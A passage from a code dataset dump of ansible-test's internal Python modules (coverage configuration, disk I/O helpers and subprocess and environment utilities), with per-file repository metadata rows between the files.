    elif isinstance(config, DockerConfig):
        platform = f'docker-{sanitize_host_name(config.name)}'
    elif isinstance(config, PosixSshConfig):
        platform = f'ssh-{sanitize_host_name(config.host)}'
    elif isinstance(config, OriginConfig):
        platform = 'origin'  # previous versions of ansible-test used "local-{python_version}"
    else:
        # fail loudly on new host config types instead of producing a misleading label
        raise NotImplementedError(f'Coverage platform label not defined for type: {type(config)}')

    return platform
def get_coverage_environment(
    args: TestConfig,
    target_name: str,
    version: str,
) -> dict[str, str]:
    """Return environment variables needed to collect code coverage.

    :param target_name: name of the test target, embedded in the coverage file name.
    :param version: Python version string, embedded in the coverage file name.
    """
    # unit tests, sanity tests and other special cases (localhost only)
    # config is in a temporary directory
    # results are in the source tree
    config_file = get_coverage_config(args)
    # file name format: {command}={target}={platform}=python-{version}=coverage
    coverage_name = '='.join((args.command, target_name, get_coverage_platform(args.controller), f'python-{version}', 'coverage'))
    coverage_dir = os.path.join(data_context().content.root, data_context().content.results_path, ResultType.COVERAGE.name)
    coverage_file = os.path.join(coverage_dir, coverage_name)

    make_dirs(coverage_dir)

    if args.coverage_check:
        # cause the 'coverage' module to be found, but not imported or enabled
        coverage_file = ''

    # Enable code coverage collection on local Python programs (this does not include Ansible modules).
    # Used by the injectors to support code coverage.
    # Used by the pytest unit test plugin to support code coverage.
    # The COVERAGE_FILE variable is also used directly by the 'coverage' module.
    env = dict(
        COVERAGE_CONF=config_file,
        COVERAGE_FILE=coverage_file,
    )

    return env
@mutex
def get_coverage_config(args: TestConfig) -> str:
    """Return the path to the coverage config, creating the config if it does not already exist."""
    # Cached as a function attribute; @mutex serializes the first creation.
    try:
        return get_coverage_config.path  # type: ignore[attr-defined]
    except AttributeError:
        pass

    coverage_config = generate_coverage_config(args)

    if args.explain:
        # explain mode performs no writes, so a fixed placeholder path is sufficient
        temp_dir = '/tmp/coverage-temp-dir'
    else:
        temp_dir = tempfile.mkdtemp()
        ExitHandler.register(lambda: remove_tree(temp_dir))  # clean up the config directory at process exit

    path = os.path.join(temp_dir, COVERAGE_CONFIG_NAME)

    if not args.explain:
        write_text_file(path, coverage_config)

    get_coverage_config.path = path  # type: ignore[attr-defined]

    return path
def generate_coverage_config(args: TestConfig) -> str:
    """Generate code coverage configuration for tests."""
    # Collections get a collection-specific config; everything else uses the ansible-core config.
    if data_context().content.collection:
        return generate_collection_coverage_config(args)

    return generate_ansible_coverage_config()
def generate_ansible_coverage_config() -> str:
    """Generate code coverage configuration for Ansible tests."""
    # The literal below is the exact .ini content handed to the 'coverage' module.
    return '''
[run]
branch = True
concurrency =
    multiprocessing
    thread
parallel = True

omit =
    */python*/dist-packages/*
    */python*/site-packages/*
    */python*/distutils/*
    */pyshared/*
    */pytest
    */AnsiballZ_*.py
    */test/results/*
'''
def generate_collection_coverage_config(args: TestConfig) -> str:
    """Generate code coverage configuration for Ansible Collection tests.

    The include/omit sections vary by command type (integration, sanity, other).
    """
    coverage_config = '''
[run]
branch = True
concurrency =
    multiprocessing
    thread
parallel = True
disable_warnings =
    no-data-collected
'''

    if isinstance(args, IntegrationConfig):
        # cover the collection content both at its source root and wherever it is installed
        coverage_config += '''
include =
    %s/*
    */%s/*
''' % (data_context().content.root, data_context().content.collection.directory)
    elif isinstance(args, SanityConfig):
        # temporary work-around for import sanity test
        coverage_config += '''
include =
    %s/*

omit =
    %s/*
''' % (data_context().content.root, os.path.join(data_context().content.root, data_context().content.results_path))
    else:
        coverage_config += '''
include =
    %s/*
''' % data_context().content.root

    return coverage_config
def self_check() -> None:
    """Check for internal errors due to incorrect code changes."""
    # Every supported Python version must resolve to some coverage version.
    for python_version in SUPPORTED_PYTHON_VERSIONS:
        get_coverage_version(python_version)

    # Every controller Python version must resolve to the latest coverage version.
    for python_version in CONTROLLER_PYTHON_VERSIONS:
        if get_coverage_version(python_version) == CONTROLLER_COVERAGE_VERSION:
            continue

        raise InternalError(f'Controller Python version {python_version} is not mapped to the latest coverage version.')
# Run the consistency checks at import time so mapping errors surface immediately.
self_check()
| 9,283
|
Python
|
.py
| 247
| 32.659919
| 130
| 0.706827
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,096
|
io.py
|
ansible_ansible/test/lib/ansible_test/_internal/io.py
|
"""Functions for disk IO."""
from __future__ import annotations
import io
import json
import os
import typing as t
from .encoding import (
ENCODING,
to_bytes,
to_text,
)
def read_json_file(path: str) -> t.Any:
    """Parse and return the json content from the specified path."""
    text = read_text_file(path)
    return json.loads(text)
def read_text_file(path: str) -> str:
    """Return the contents of the specified path as text."""
    contents = read_binary_file(path)
    return to_text(contents)
def read_binary_file(path: str) -> bytes:
    """Return the contents of the specified path as bytes."""
    with open_binary_file(path) as binary_fd:
        return binary_fd.read()
def make_dirs(path: str) -> None:
    """Create a directory at path, including any necessary parent directories."""
    # exist_ok makes this a no-op for directories which already exist.
    encoded_path = to_bytes(path)
    os.makedirs(encoded_path, exist_ok=True)
def write_json_file(
    path: str,
    content: t.Any,
    create_directories: bool = False,
    formatted: bool = True,
    encoder: t.Optional[t.Type[json.JSONEncoder]] = None,
) -> str:
    """Write the given json content to the specified path, optionally creating missing directories. Returns the serialized text."""
    # Formatted output is sorted and indented for readability; unformatted output is compact.
    if formatted:
        dump_options = dict(sort_keys=True, indent=4, separators=(', ', ': '))
    else:
        dump_options = dict(sort_keys=False, indent=None, separators=(',', ':'))

    text_content = json.dumps(content, cls=encoder, **dump_options) + '\n'

    write_text_file(path, text_content, create_directories=create_directories)

    return text_content
def write_text_file(path: str, content: str, create_directories: bool = False) -> None:
    """Write the given text content to the specified path, optionally creating missing directories."""
    data = to_bytes(content)

    if create_directories:
        make_dirs(os.path.dirname(path))

    with open_binary_file(path, 'wb') as binary_fd:
        binary_fd.write(data)
def open_text_file(path: str, mode: str = 'r') -> t.IO[str]:
    """Open the given path for text access, rejecting binary modes."""
    if 'b' not in mode:
        return io.open(to_bytes(path), mode, encoding=ENCODING)  # pylint: disable=consider-using-with

    raise Exception('mode cannot include "b" for text files: %s' % mode)
def open_binary_file(path: str, mode: str = 'rb') -> t.IO[bytes]:
    """Open the given path for binary access, rejecting text modes."""
    if 'b' in mode:
        return io.open(to_bytes(path), mode)  # pylint: disable=consider-using-with

    raise Exception('mode must include "b" for binary files: %s' % mode)
class SortedSetEncoder(json.JSONEncoder):
    """JSON encoder which serializes sets as sorted lists."""

    def default(self, o: t.Any) -> t.Any:
        """Return a serialized version of the `o` object."""
        if not isinstance(o, set):
            # Defer to the base encoder for everything except sets.
            return super().default(o)

        return sorted(o)
| 2,807
|
Python
|
.py
| 63
| 37.571429
| 102
| 0.644829
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,097
|
util.py
|
ansible_ansible/test/lib/ansible_test/_internal/util.py
|
"""Miscellaneous utility functions and classes."""
from __future__ import annotations
import abc
import collections.abc as c
import enum
import fcntl
import importlib.util
import inspect
import json
import keyword
import os
import platform
import pkgutil
import random
import re
import shutil
import stat
import string
import subprocess
import sys
import time
import functools
import shlex
import typing as t
import warnings
from struct import unpack, pack
from termios import TIOCGWINSZ
# CAUTION: Avoid third-party imports in this module whenever possible.
# Any third-party imports occurring here will result in an error if they are vendored by ansible-core.
from .locale_util import (
LOCALE_WARNING,
CONFIGURED_LOCALE,
)
from .encoding import (
to_bytes,
to_optional_bytes,
to_optional_text,
)
from .io import (
open_binary_file,
read_text_file,
)
from .thread import (
mutex,
WrappedThread,
)
from .constants import (
SUPPORTED_PYTHON_VERSIONS,
)
# Generic type variables used throughout ansible-test.
C = t.TypeVar('C')
TBase = t.TypeVar('TBase')
TKey = t.TypeVar('TKey')
TValue = t.TypeVar('TValue')

# Mapping of Python version to interpreter path.
PYTHON_PATHS: dict[str, str] = {}

COVERAGE_CONFIG_NAME = 'coveragerc'

ANSIBLE_TEST_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# assume running from install
ANSIBLE_ROOT = os.path.dirname(ANSIBLE_TEST_ROOT)
ANSIBLE_LIB_ROOT = os.path.join(ANSIBLE_ROOT, 'ansible')
ANSIBLE_SOURCE_ROOT = None

if not os.path.exists(ANSIBLE_LIB_ROOT):
    # running from source
    ANSIBLE_ROOT = os.path.dirname(os.path.dirname(os.path.dirname(ANSIBLE_TEST_ROOT)))
    ANSIBLE_LIB_ROOT = os.path.join(ANSIBLE_ROOT, 'lib', 'ansible')
    ANSIBLE_SOURCE_ROOT = ANSIBLE_ROOT

# Well-known directories within the ansible-test tree.
ANSIBLE_TEST_DATA_ROOT = os.path.join(ANSIBLE_TEST_ROOT, '_data')
ANSIBLE_TEST_UTIL_ROOT = os.path.join(ANSIBLE_TEST_ROOT, '_util')
ANSIBLE_TEST_CONFIG_ROOT = os.path.join(ANSIBLE_TEST_ROOT, 'config')

ANSIBLE_TEST_CONTROLLER_ROOT = os.path.join(ANSIBLE_TEST_UTIL_ROOT, 'controller')
ANSIBLE_TEST_TARGET_ROOT = os.path.join(ANSIBLE_TEST_UTIL_ROOT, 'target')

ANSIBLE_TEST_TOOLS_ROOT = os.path.join(ANSIBLE_TEST_CONTROLLER_ROOT, 'tools')
ANSIBLE_TEST_TARGET_TOOLS_ROOT = os.path.join(ANSIBLE_TEST_TARGET_ROOT, 'tools')

# Modes are set to allow all users the same level of access.
# This permits files to be used in tests that change users.
# The only exception is write access to directories for the user creating them.
# This avoids having to modify the directory permissions a second time.

MODE_READ = stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH

MODE_FILE = MODE_READ
MODE_FILE_EXECUTE = MODE_FILE | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
MODE_FILE_WRITE = MODE_FILE | stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH

MODE_DIRECTORY = MODE_READ | stat.S_IWUSR | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
MODE_DIRECTORY_WRITE = MODE_DIRECTORY | stat.S_IWGRP | stat.S_IWOTH
class OutputStream(enum.Enum):
    """The output stream to use when running a subprocess and redirecting/capturing stdout or stderr."""

    ORIGINAL = enum.auto()
    AUTO = enum.auto()

    def get_buffer(self, original: t.BinaryIO) -> t.BinaryIO:
        """Return the correct output buffer to use, taking into account the given original buffer."""
        if self is OutputStream.AUTO:
            # AUTO routes output through the global display's file descriptor.
            return display.fd.buffer

        if self is OutputStream.ORIGINAL:
            return original

        raise NotImplementedError(str(self))
class Architecture:
    """
    Normalized architecture names.
    These are the architectures supported by ansible-test, such as when provisioning remote instances.
    """

    # The attribute values (not names) are collected into REMOTE_ARCHITECTURES below.
    X86_64 = 'x86_64'
    AARCH64 = 'aarch64'
# Every non-dunder attribute of Architecture is treated as a supported remote architecture.
REMOTE_ARCHITECTURES = list(value for key, value in Architecture.__dict__.items() if not key.startswith('__'))

WINDOWS_CONNECTION_VARIABLES: dict[str, t.Any] = {
    # PowerShell Remoting Protocol over HTTP/HTTPS.
    'psrp+http': dict(
        ansible_port=5985,
        ansible_psrp_protocol='http',
        use_password=True,
    ),
    'psrp+https': dict(
        ansible_port=5986,
        ansible_psrp_protocol='https',
        ansible_psrp_cert_validation='ignore',
        use_password=True,
    ),
    # SSH with key or password authentication, using a PowerShell shell on the target.
    'ssh+key': dict(
        ansible_port=22,
        ansible_shell_type='powershell',
        use_password=False,
    ),
    'ssh+password': dict(
        ansible_port=22,
        ansible_shell_type='powershell',
        use_password=True,
    ),
    # WinRM over HTTP/HTTPS.
    'winrm+http': dict(
        ansible_port=5985,
        ansible_winrm_scheme='http',
        ansible_winrm_transport='ntlm',
        use_password=True,
    ),
    'winrm+https': dict(
        ansible_port=5986,
        ansible_winrm_scheme='https',
        ansible_winrm_server_cert_validation='ignore',
        use_password=True,
    ),
}
"""Dictionary of Windows connection types and variables required to use them."""

WINDOWS_CONNECTIONS = list(WINDOWS_CONNECTION_VARIABLES)
def is_valid_identifier(value: str) -> bool:
    """Return True if the given value is a valid non-keyword Python identifier, otherwise return False."""
    if keyword.iskeyword(value):
        return False

    return value.isidentifier()
def cache(func: c.Callable[[], TValue]) -> c.Callable[[], TValue]:
    """Enforce exclusive access on a decorated function and cache the result."""
    sentinel = object()  # distinguishes "not yet computed" from a cached None/falsey result
    storage: dict[None, TValue] = {}

    @functools.wraps(func)
    def cache_func():
        """Cache the return value from func."""
        value = storage.get(None, sentinel)

        if value is sentinel:
            value = storage[None] = func()

        return value

    # mutex serializes calls, so func() runs at most once even under concurrency.
    return mutex(cache_func)
@mutex
def detect_architecture(python: str) -> t.Optional[str]:
    """Detect the architecture of the specified Python and return a normalized version, or None if it cannot be determined."""
    results: dict[str, t.Optional[str]]

    # Results are cached on the function object so repeated lookups avoid spawning subprocesses.
    try:
        results = detect_architecture.results  # type: ignore[attr-defined]
    except AttributeError:
        results = detect_architecture.results = {}  # type: ignore[attr-defined]

    if python in results:
        return results[python]

    # Use the in-process platform data when asking about the current interpreter,
    # otherwise run the target interpreter to report its own platform data.
    if python == sys.executable or os.path.realpath(python) == os.path.realpath(sys.executable):
        uname = platform.uname()
    else:
        data = raw_command([python, '-c', 'import json, platform; print(json.dumps(platform.uname()));'], capture=True)[0]
        uname = json.loads(data)

    # Map platform-specific names to the normalized Architecture values.
    translation = {
        'x86_64': Architecture.X86_64,  # Linux, macOS
        'amd64': Architecture.X86_64,  # FreeBSD
        'aarch64': Architecture.AARCH64,  # Linux, FreeBSD
        'arm64': Architecture.AARCH64,  # FreeBSD
    }

    candidates = []

    # uname entries 4 (machine) and 5 (processor) may each identify the architecture.
    if len(uname) >= 5:
        candidates.append(uname[4])

    if len(uname) >= 6:
        candidates.append(uname[5])

    candidates = sorted(set(candidates))
    architectures = sorted(set(arch for arch in [translation.get(candidate) for candidate in candidates] if arch))

    architecture: t.Optional[str] = None

    # Exactly one recognized architecture is required; none or conflicting values produce a warning and None.
    if not architectures:
        display.warning(f'Unable to determine architecture for Python interpreter "{python}" from: {candidates}')
    elif len(architectures) == 1:
        architecture = architectures[0]
        display.info(f'Detected architecture {architecture} for Python interpreter: {python}', verbosity=1)
    else:
        display.warning(f'Conflicting architectures detected ({architectures}) for Python interpreter "{python}" from: {candidates}')

    results[python] = architecture

    return architecture
def filter_args(args: list[str], filters: dict[str, int]) -> list[str]:
    """Return a filtered version of the given command line arguments.

    The filters dictionary maps option names to the number of values they consume;
    filtered options and their values are removed from the result.
    """
    remaining = 0  # values still to be dropped for the most recently filtered option
    result = []

    for arg in args:
        if remaining and not arg.startswith('-'):
            remaining -= 1
            continue

        remaining = 0

        key, sep, _value = arg.partition('=')

        if key in filters:
            # A value supplied inline with '=' counts toward the values to drop.
            remaining = filters[key] - (1 if sep else 0)
            continue

        result.append(arg)

    return result
def read_lines_without_comments(path: str, remove_blank_lines: bool = False, optional: bool = False) -> list[str]:
    """
    Returns lines from the specified text file with comments removed.
    Comments are any content from a hash symbol to the end of a line.
    Any spaces immediately before a comment are also removed.
    """
    if optional and not os.path.exists(path):
        return []

    stripped_lines = [re.sub(r' *#.*$', '', line) for line in read_text_file(path).splitlines()]

    if remove_blank_lines:
        return [line for line in stripped_lines if line]

    return stripped_lines
def exclude_none_values(data: dict[TKey, t.Optional[TValue]]) -> dict[TKey, TValue]:
    """Return the provided dictionary with any None values excluded."""
    return {key: value for key, value in data.items() if value is not None}
def find_executable(executable: str, cwd: t.Optional[str] = None, path: t.Optional[str] = None, required: t.Union[bool, str] = True) -> t.Optional[str]:
    """
    Find the specified executable and return the full path, or None if it could not be found.
    If required is True an exception will be raised if the executable is not found.
    If required is set to 'warning' then a warning will be shown if the executable is not found.
    """
    match = None
    real_cwd = os.getcwd()

    if not cwd:
        cwd = real_cwd

    if os.path.dirname(executable):
        # A path (relative or absolute) was given, so check only that single location.
        target = os.path.join(cwd, executable)

        if os.path.exists(target) and os.access(target, os.F_OK | os.X_OK):
            match = executable
    else:
        # Only a bare name was given, so search the PATH directories.
        if path is None:
            path = os.environ.get('PATH', os.path.defpath)

        if path:
            path_dirs = path.split(os.path.pathsep)
            seen_dirs = set()

            for path_dir in path_dirs:
                # Skip duplicate PATH entries.
                if path_dir in seen_dirs:
                    continue

                seen_dirs.add(path_dir)

                # Substitute the requested cwd for PATH entries which refer to the actual working directory.
                if os.path.abspath(path_dir) == real_cwd:
                    path_dir = cwd

                candidate = os.path.join(path_dir, executable)

                if os.path.exists(candidate) and os.access(candidate, os.F_OK | os.X_OK):
                    match = candidate
                    break

    if not match and required:
        message = 'Required program "%s" not found.' % executable

        # required='warning' downgrades the failure to a warning instead of raising.
        if required != 'warning':
            raise ApplicationError(message)

        display.warning(message)

    return match
def find_python(version: str, path: t.Optional[str] = None, required: bool = True) -> t.Optional[str]:
    """
    Find and return the full path to the specified Python version.
    If required, an exception will be raised not found.
    If not required, None will be returned if not found.
    """
    version_info = str_to_version(version)

    # Prefer the current interpreter when it matches the requested version and no explicit search path was given.
    if not path and version_info == sys.version_info[:len(version_info)]:
        return sys.executable

    return find_executable('python%s' % version, path=path, required=required)
@cache
def get_ansible_version() -> str:
    """Return the Ansible version, read from the ansible-core release module."""
    # ansible may not be in our sys.path
    # avoids a symlink to release.py since ansible placement relative to ansible-test may change during delegation
    load_module(os.path.join(ANSIBLE_LIB_ROOT, 'release.py'), 'ansible_release')

    # noinspection PyUnresolvedReferences
    from ansible_release import __version__ as ansible_version  # pylint: disable=import-error

    return ansible_version
def _enable_vendoring() -> None:
    """Enable support for loading Python packages vendored by ansible-core."""
    # Load the vendoring code by file path, since ansible may not be in our sys.path.
    # Convert warnings into errors, to avoid problems from surfacing later.
    # NOTE(review): loading ansible._vendor appears to rely on its import-time side effects — confirm against that package.
    with warnings.catch_warnings():
        warnings.filterwarnings('error')

        load_module(os.path.join(ANSIBLE_LIB_ROOT, '_vendor', '__init__.py'), 'ansible_vendor')
@cache
def get_available_python_versions() -> dict[str, str]:
    """Return a dictionary indicating which supported Python versions are available."""
    available = {}

    for version in SUPPORTED_PYTHON_VERSIONS:
        python_bin = find_python(version, required=False)

        # Versions without a discoverable interpreter are omitted entirely.
        if python_bin:
            available[version] = python_bin

    return available
def raw_command(
    cmd: c.Iterable[str],
    capture: bool,
    env: t.Optional[dict[str, str]] = None,
    data: t.Optional[str] = None,
    cwd: t.Optional[str] = None,
    explain: bool = False,
    stdin: t.Optional[t.Union[t.IO[bytes], int]] = None,
    stdout: t.Optional[t.Union[t.IO[bytes], int]] = None,
    interactive: bool = False,
    output_stream: t.Optional[OutputStream] = None,
    cmd_verbosity: int = 1,
    str_errors: str = 'strict',
    error_callback: t.Optional[c.Callable[[SubprocessError], None]] = None,
) -> tuple[t.Optional[str], t.Optional[str]]:
    """Run the specified command and return stdout and stderr as a tuple.

    Raises SubprocessError on a non-zero exit status and ApplicationError when the program cannot be found.
    With explain=True the command is only reported, not run, and (None, None) is returned.
    """
    output_stream = output_stream or OutputStream.AUTO

    # Reject option combinations which cannot work together.
    if capture and interactive:
        raise InternalError('Cannot combine capture=True with interactive=True.')

    if data and interactive:
        raise InternalError('Cannot combine data with interactive=True.')

    if stdin and interactive:
        raise InternalError('Cannot combine stdin with interactive=True.')

    if stdout and interactive:
        raise InternalError('Cannot combine stdout with interactive=True.')

    if stdin and data:
        raise InternalError('Cannot combine stdin with data.')

    if stdout and not capture:
        raise InternalError('Redirection of stdout requires capture=True to avoid redirection of stderr to stdout.')

    if output_stream != OutputStream.AUTO and capture:
        raise InternalError(f'Cannot combine {output_stream=} with capture=True.')

    if output_stream != OutputStream.AUTO and interactive:
        raise InternalError(f'Cannot combine {output_stream=} with interactive=True.')

    if not cwd:
        cwd = os.getcwd()

    if not env:
        env = common_environment()

    cmd = list(cmd)

    escaped_cmd = shlex.join(cmd)

    # Build a human-readable description of how the command will be run, for verbose output.
    if capture:
        description = 'Run'
    elif interactive:
        description = 'Interactive'
    else:
        description = 'Stream'

    description += ' command'
    with_types = []

    if data:
        with_types.append('data')

    if stdin:
        with_types.append('stdin')

    if stdout:
        with_types.append('stdout')

    if with_types:
        description += f' with {"/".join(with_types)}'

    display.info(f'{description}: {escaped_cmd}', verbosity=cmd_verbosity, truncate=True)
    display.info('Working directory: %s' % cwd, verbosity=2)

    program = find_executable(cmd[0], cwd=cwd, path=env['PATH'], required=False)

    if program:
        display.info('Program found: %s' % program, verbosity=2)

    for key in sorted(env.keys()):
        display.info('%s=%s' % (key, env[key]), verbosity=2)

    if explain:
        return None, None

    communicate = False

    # Decide where the subprocess stdin comes from: an explicit handle, piped data, our own stdin, or nothing.
    if stdin is not None:
        data = None
    elif data is not None:
        stdin = subprocess.PIPE
        communicate = True
    elif interactive:
        pass  # allow the subprocess access to our stdin
    else:
        stdin = subprocess.DEVNULL

    if not interactive:
        # When not running interactively, send subprocess stdout/stderr through a pipe.
        # This isolates the stdout/stderr of the subprocess from the current process, and also hides the current TTY from it, if any.
        # This prevents subprocesses from sharing stdout/stderr with the current process or each other.
        # Doing so allows subprocesses to safely make changes to their file handles, such as making them non-blocking (ssh does this).
        # This also maintains consistency between local testing and CI systems, which typically do not provide a TTY.
        # To maintain output ordering, a single pipe is used for both stdout/stderr when not capturing output unless the output stream is ORIGINAL.
        stdout = stdout or subprocess.PIPE
        stderr = subprocess.PIPE if capture or output_stream == OutputStream.ORIGINAL else subprocess.STDOUT
        communicate = True
    else:
        stderr = None

    start = time.time()
    process = None

    try:
        try:
            cmd_bytes = [to_bytes(arg) for arg in cmd]
            env_bytes = dict((to_bytes(k), to_bytes(v)) for k, v in env.items())
            process = subprocess.Popen(cmd_bytes, env=env_bytes, stdin=stdin, stdout=stdout, stderr=stderr, cwd=cwd)  # pylint: disable=consider-using-with
        except FileNotFoundError as ex:
            raise ApplicationError('Required program "%s" not found.' % cmd[0]) from ex

        if communicate:
            data_bytes = to_optional_bytes(data)
            stdout_bytes, stderr_bytes = communicate_with_process(process, data_bytes, stdout == subprocess.PIPE, stderr == subprocess.PIPE, capture=capture,
                                                                  output_stream=output_stream)
            stdout_text = to_optional_text(stdout_bytes, str_errors) or ''
            stderr_text = to_optional_text(stderr_bytes, str_errors) or ''
        else:
            process.wait()
            stdout_text, stderr_text = None, None
    finally:
        # If an exception escaped before the process finished, kill it to avoid orphaning a child process.
        if process and process.returncode is None:
            process.kill()
            display.info('')  # the process we're interrupting may have completed a partial line of output
            display.notice('Killed command to avoid an orphaned child process during handling of an unexpected exception.')

    status = process.returncode
    runtime = time.time() - start

    display.info('Command exited with status %s after %s seconds.' % (status, runtime), verbosity=4)

    if status == 0:
        return stdout_text, stderr_text

    raise SubprocessError(cmd, status, stdout_text, stderr_text, runtime, error_callback)
def communicate_with_process(
    process: subprocess.Popen,
    stdin: t.Optional[bytes],
    stdout: bool,
    stderr: bool,
    capture: bool,
    output_stream: OutputStream,
) -> tuple[bytes, bytes]:
    """Communicate with the specified process, handling stdin/stdout/stderr as requested.

    A dedicated thread services each requested stream to avoid pipe deadlocks.
    Returns the collected (stdout, stderr) bytes; streams which were not read yield empty bytes.
    """
    threads: list[WrappedThread] = []
    reader: t.Type[ReaderThread]

    # Captured output accumulates in memory; otherwise it is relayed to the selected output stream.
    if capture:
        reader = CaptureThread
    else:
        reader = OutputThread

    if stdin is not None:
        threads.append(WriterThread(process.stdin, stdin))

    if stdout:
        stdout_reader = reader(process.stdout, output_stream.get_buffer(sys.stdout.buffer))
        threads.append(stdout_reader)
    else:
        stdout_reader = None

    if stderr:
        stderr_reader = reader(process.stderr, output_stream.get_buffer(sys.stderr.buffer))
        threads.append(stderr_reader)
    else:
        stderr_reader = None

    for thread in threads:
        thread.start()

    # Wait for all I/O threads; failures are reported but do not abort the remaining joins.
    for thread in threads:
        try:
            thread.wait_for_result()
        except Exception as ex:  # pylint: disable=broad-except
            display.error(str(ex))

    if isinstance(stdout_reader, ReaderThread):
        stdout_bytes = b''.join(stdout_reader.lines)
    else:
        stdout_bytes = b''

    if isinstance(stderr_reader, ReaderThread):
        stderr_bytes = b''.join(stderr_reader.lines)
    else:
        stderr_bytes = b''

    process.wait()

    return stdout_bytes, stderr_bytes
class WriterThread(WrappedThread):
    """Thread to write data to stdin of a subprocess."""

    def __init__(self, handle: t.IO[bytes], data: bytes) -> None:
        super().__init__(self._run)

        self.handle = handle  # the subprocess stdin pipe
        self.data = data  # the bytes to write to the pipe

    def _run(self) -> None:
        """Workload to run on a thread."""
        try:
            self.handle.write(self.data)
            self.handle.flush()
        finally:
            # Closing stdin signals end-of-input to the subprocess, even if the write failed.
            self.handle.close()
class ReaderThread(WrappedThread, metaclass=abc.ABCMeta):
    """Thread to read stdout from a subprocess."""

    def __init__(self, handle: t.IO[bytes], buffer: t.BinaryIO) -> None:
        super().__init__(self._run)

        self.handle = handle  # the subprocess output pipe to read from
        self.buffer = buffer  # destination buffer, used by subclasses which relay output
        self.lines: list[bytes] = []  # collected lines, used by subclasses which capture output

    @abc.abstractmethod
    def _run(self) -> None:
        """Workload to run on a thread."""
class CaptureThread(ReaderThread):
    """Thread to capture stdout from a subprocess into a buffer."""

    def _run(self) -> None:
        """Workload to run on a thread."""
        # Collect each line from the pipe; close the pipe even if reading fails.
        try:
            for line in self.handle:
                self.lines.append(line)
        finally:
            self.handle.close()
class OutputThread(ReaderThread):
    """Thread to pass stdout from a subprocess to stdout."""

    def _run(self) -> None:
        """Workload to run on a thread."""
        # Relay each line to the destination buffer as it arrives, flushing per line.
        try:
            for line in self.handle:
                self.buffer.write(line)
                self.buffer.flush()
        finally:
            self.handle.close()
def common_environment() -> dict[str, str]:
    """Common environment used for executing all programs.

    Builds a minimal, controlled environment from the current process environment:
    a fixed locale and PATH, required variables which must exist, and optional
    variables which are passed through only when present.
    """
    env = dict(
        LC_ALL=CONFIGURED_LOCALE,
        PATH=os.environ.get('PATH', os.path.defpath),
    )

    # These variables must be present in the current environment or pass_vars will raise.
    required = (
        'HOME',
    )

    # These variables are passed through only when present.
    optional = (
        'LD_LIBRARY_PATH',
        'SSH_AUTH_SOCK',
        # MacOS High Sierra Compatibility
        # http://sealiesoftware.com/blog/archive/2017/6/5/Objective-C_and_fork_in_macOS_1013.html
        # Example configuration for macOS:
        # export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
        'OBJC_DISABLE_INITIALIZE_FORK_SAFETY',
        'ANSIBLE_KEEP_REMOTE_FILES',
        # MacOS Homebrew Compatibility
        # https://cryptography.io/en/latest/installation/#building-cryptography-on-macos
        # This may also be required to install pyyaml with libyaml support when installed in non-standard locations.
        # Example configuration for brew on macOS:
        # export LDFLAGS="-L$(brew --prefix openssl)/lib/ -L$(brew --prefix libyaml)/lib/"
        # export CFLAGS="-I$(brew --prefix openssl)/include/ -I$(brew --prefix libyaml)/include/"
        'LDFLAGS',
        'CFLAGS',
    )

    # FreeBSD Compatibility
    # This is required to include libyaml support in PyYAML.
    # The header /usr/local/include/yaml.h isn't in the default include path for the compiler.
    # It is included here so that tests can take advantage of it, rather than only ansible-test during managed pip installs.
    # If CFLAGS has been set in the environment that value will take precedence due to being an optional var when calling pass_vars.
    if os.path.exists('/etc/freebsd-update.conf'):
        env.update(CFLAGS='-I/usr/local/include/')

    env.update(pass_vars(required=required, optional=optional))

    return env
def report_locale(show_warning: bool) -> None:
    """Report the configured locale and the locale warning, if applicable."""
    display.info(f'Configured locale: {CONFIGURED_LOCALE}', verbosity=1)

    # Only surface the warning when one exists and the caller asked for it.
    if not show_warning or not LOCALE_WARNING:
        return

    display.warning(LOCALE_WARNING)
def pass_vars(required: c.Collection[str], optional: c.Collection[str]) -> dict[str, str]:
    """Return a filtered dictionary of environment variables based on the current environment.

    Required variables which are missing raise MissingEnvironmentVariable; optional variables
    are included only when present.
    """
    missing = [name for name in required if name not in os.environ]

    if missing:
        # Report the first missing variable, matching required iteration order.
        raise MissingEnvironmentVariable(missing[0])

    env = {name: os.environ[name] for name in required}
    env.update((name, os.environ[name]) for name in optional if name in os.environ)

    return env
def verified_chmod(path: str, mode: int) -> None:
    """Perform chmod on the specified path and then verify the permissions were applied.

    Raises ApplicationError when an executable mode was requested but the path is not executable afterwards.
    """
    os.chmod(path, mode)  # pylint: disable=ansible-bad-function

    # Only verify execute permission, since that is what mount options such as "noexec" can silently strip.
    executable = any(mode & perm for perm in (stat.S_IXUSR, stat.S_IXGRP, stat.S_IXOTH))

    if executable and not os.access(path, os.X_OK):
        # Fixed grammar of the original message: 'should executable' -> 'should be executable'.
        raise ApplicationError(f'Path "{path}" should be executable, but is not. Is the filesystem mounted with the "noexec" option?')
def remove_tree(path: str) -> None:
    """Remove the specified directory, silently continuing if the directory does not exist."""
    try:
        shutil.rmtree(to_bytes(path))
    except FileNotFoundError:
        # A missing directory is treated as already removed.
        pass
def is_binary_file(path: str) -> bool:
    """Return True if the specified file is a binary file, otherwise return False."""
    # Extensions whose files are always treated as text.
    text_extensions = (
        '.cfg', '.conf', '.crt', '.cs', '.css', '.html', '.ini', '.j2', '.js', '.json',
        '.md', '.pem', '.ps1', '.psm1', '.py', '.rst', '.sh', '.txt', '.xml', '.yaml', '.yml',
    )

    # Extensions whose files are always treated as binary.
    binary_extensions = (
        '.bin', '.eot', '.gz', '.ico', '.iso', '.jpg', '.otf', '.p12', '.png', '.pyc',
        '.rpm', '.ttf', '.woff', '.woff2', '.zip',
    )

    ext = os.path.splitext(path)[1]

    if ext in text_extensions:
        return False

    if ext in binary_extensions:
        return True

    # Unknown extension: sniff the first 4 KiB of content; a NUL byte indicates binary data.
    with open_binary_file(path) as path_fd:
        return b'\0' in path_fd.read(4096)
def generate_name(length: int = 8) -> str:
    """Generate and return a random name of the given length, using letters and digits."""
    pool = string.ascii_letters + string.digits
